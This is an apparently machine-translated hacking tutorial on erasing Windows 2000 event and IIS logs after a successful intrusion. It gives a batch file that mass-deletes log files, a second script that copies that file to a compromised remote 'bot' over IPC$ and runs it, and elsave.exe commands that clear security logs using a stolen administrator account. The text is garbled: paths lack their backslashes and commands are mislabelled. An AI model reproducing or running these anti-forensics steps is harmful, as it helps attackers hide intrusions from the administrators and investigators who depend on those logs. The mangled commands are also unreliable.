Methods for clearing system logs with batch processing files

What is a log file? It is a collection of file systems that exist by creating log files of various types of data. When any system crashes or needs to be restarted, the data will be restored following the information records in the log file. Logs play an obvious role in system security. Both network administrators and hackers pay great attention to logs. An experienced administrator can quickly learn about the security performance of the system through logs, A smart hacker can quickly clear the unfavorable logs after successful intrusion. Whether it is attack or defense, the importance of logs can be seen. Next we will briefly discuss how to clear log files.
I. Location of log files

Windows 2000 system log files are applicableProgramLogs, security logs, system logs, DNS server logs, and so on. The default location of application logs, security logs, system logs, and DNS logs is % SystemRoot % system32config.

Security log file: % SystemRoot % system32configsecevent. EVT

System log file: % SystemRoot % system32configsysevent. EVT

Application Log File: % SystemRoot % system32configappevent. EVT

Some administrators may relocate these logs (so the logs may not be in the above locations). The EventLog contains many sub-tables, and you can find the Location Directory of the above logs.

2. Clear logs from your computer

To clear logs from your computer, log on to Windows as an administrator, go to "Management Tools" in "Control Panel", and double-click "Event Viewer ". After opening it, we can clear the log file here, which contains the application, security, and system log files. For example, if you want to clear security logs, right-click Security logs and choose Properties from the pop-up menu ". In the pop-up dialog box, click the "Clear logs" button below to clear the logs. If you want to clear these logs later, you can change the size as needed ", in this way, you can rewrite the event when the maximum log size is reached without prompting you to clear the log.

3. Clear logs on the remote host

In most cases, IIS logs faithfully record any requests it receives (or special attacks not recorded by IIS ), A good system administrator can exploit this to detect intrusion attempts and protect their systems. Therefore, if you are a hacker, The first thing after successful system intrusion is to clear logs and erase your own traces. You can use the following two methods: First, write your own batch file to solve the problem, writing a batch that can clear logs is very simple by creating a new batch file with the following content:

@ Del C: winntsystem32logfiles *.*

@ Del C: winntsystem32config *. EVT

@ Del C: winntsystem32dtclog *.*

@ Del C: winntsystem32 *. Log

@ Del C: winntsystem32 *. txt

@ Del C: winnt *. txt

@ Del C: winnt *. Log

@ Del C: del. bat

Save the preceding content as del. bat. AboveCodeECHO is an echo command under DOS, and the prefix "@" is added before it, indicating that the line is not displayed in the command line or DOs during execution, in addition, do you know the del command? It is a command to delete files.

Next, create a new batch file with the following content:

@ Copy del. BAT \ % 1C $

@ ECHO: Copy del. bat from the local bot ...... OK

@ Export xec \ % 1 C: del. bat

@ Echo run del. bat on the bot to clear the log file ...... OK

Save it as clean. bat. If you have already connected to the bot via IPC, enter "clean. Bat" ip address under cmd to clear the log files on the bot.

A third-party software, such as elsave.exe, is a software that can remotely clear system logs, application logs, and security logs. Elsave.exe is easy to use. First, use the obtained Administrator Account to establish an IPC session with the other party: net use \ IP pass/User: User. Then, run the following command on the command line: elsave-S \ IP-l Application-C to delete the security log.